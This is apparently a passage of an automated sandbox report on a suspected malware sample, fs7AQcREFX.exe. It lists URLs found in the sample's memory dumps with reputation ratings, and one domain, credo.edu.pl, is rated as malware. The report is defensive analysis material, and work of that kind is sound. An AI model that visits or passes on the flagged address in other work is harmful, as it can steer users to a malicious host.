00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://www.com-sit.com/branchen-know-how/fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      http://www.mobilnic.net/Zfs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.pb-games.com/Qfs7AQcREFX.exe, 00000000.00000003.619032185.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2Ffs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpgfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.13fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.13.3fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        http://www.credo.edu.pl/&fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpgfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://www.petsfan.com/q&mfs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.myropcb.com/why-use-myro/terms-of-service/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.pcgrate.comfs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://www.alantron.com/turkce/web-hosting/garanti.tofs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://lolipop.jp/fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://www.com-sit.com/feed/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              http://www.mobilnic.net/cfs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pb-games.com/efs7AQcREFX.exe, 00000000.00000003.619032185.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.vexcom.com/mfs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://www.naoi-a.com/fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pb-games.com/sfs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
